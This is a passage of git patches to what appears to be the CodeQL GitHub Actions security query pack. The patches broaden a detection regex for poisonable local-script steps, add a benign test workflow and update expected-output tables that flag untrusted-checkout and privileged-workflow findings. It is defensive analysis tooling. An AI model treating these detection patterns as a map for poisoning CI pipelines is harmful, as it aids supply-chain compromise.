.github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -322,5 +332,8 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 61c328b7011..e0164eafac8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 966a9b1652a6e4f635356fdc7bba27c69c5a2c6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:05:27 +0200 Subject: [PATCH 0377/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 34000094dd8..59ab88b42e4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.12 +version: 0.1.13 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5ccbc7b9657..f25fd70619f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.12 +version: 0.1.13 groups: [actions, queries] suites: codeql-suites extractor: javascript From e5064f80902240969b4269fa031f79cebd32bbf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:16:50 +0200 Subject: [PATCH 0378/1267] Improve poisonable steps --- .../actions/security/PoisonableSteps.qll | 4 +- ql/lib/ext/config/poisonable_steps.yml | 1 + .../.github/workflows/poisonable_steps.yml | 25 ++ .../library-tests/poisonable_steps.expected | 18 ++ ql/test/library-tests/poisonable_steps.ql | 5 + ql/test/library-tests/test.expected | 241 ++++++++++++++++++ .../CWE-829/.github/workflows/test7.yml | 58 +++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 24 ++ 9 files changed, 376 insertions(+), 1 deletion(-) create mode 100644 ql/test/library-tests/.github/workflows/poisonable_steps.yml create mode 100644 ql/test/library-tests/poisonable_steps.expected create mode 100644 ql/test/library-tests/poisonable_steps.ql create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index dc0f3876f86..b0c6f7aa6a9 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -30,7 +30,9 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) - cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) + cmd = + line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", + group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f13a2a16d35..ff3df1f699c 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -58,6 +58,7 @@ extensions: data: # TODO: It could also be in the form of `dir/cmd` - ["(\\.\\/)(.*)", 3] + - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - ["(python)\\s+(.*)\\.py", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml new file mode 100644 index 00000000000..3e31507cef1 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -0,0 +1,25 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: venv/bin/activate # not supported yet + - run: . venv/bin/activate + - run: echo foo; . venv/bin/activate + - run: echo foo;. venv/bin/activate + - run: echo foo |. venv/bin/activate + - run: ./venv/bin/activate + - run: sh venv/bin/activate.sh + - run: echo $(sh venv/bin/activate.sh) + - run: echo foo; sh venv/bin/activate.sh; echo bar + - run: echo foo | sh venv/bin/activate.sh > output + - run: python venv/bin/activate.py + - run: echo foo; python venv/bin/activate.py + - run: pnpm run test:ct + - run: pip install nbformat && python scripts/generate_notebooks.py + - run: python scripts/generate_theme.py --outfile js/storybook/theme.css + - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + + diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected new file mode 100644 index 00000000000..62ffff3c15c --- /dev/null +++ b/ql/test/library-tests/poisonable_steps.expected @@ -0,0 +1,18 @@ +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | diff --git a/ql/test/library-tests/poisonable_steps.ql b/ql/test/library-tests/poisonable_steps.ql new file mode 100644 index 00000000000..1aacdd14d14 --- /dev/null +++ b/ql/test/library-tests/poisonable_steps.ql @@ -0,0 +1,5 @@ +import actions +import codeql.actions.security.PoisonableSteps + +from PoisonableStep step +select step diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index b09473fc132..efb0bca6952 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,21 +1,25 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -41,6 +45,23 @@ steps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -69,6 +90,23 @@ runSteps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -130,6 +168,23 @@ runStepChildren | .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -282,6 +337,82 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | 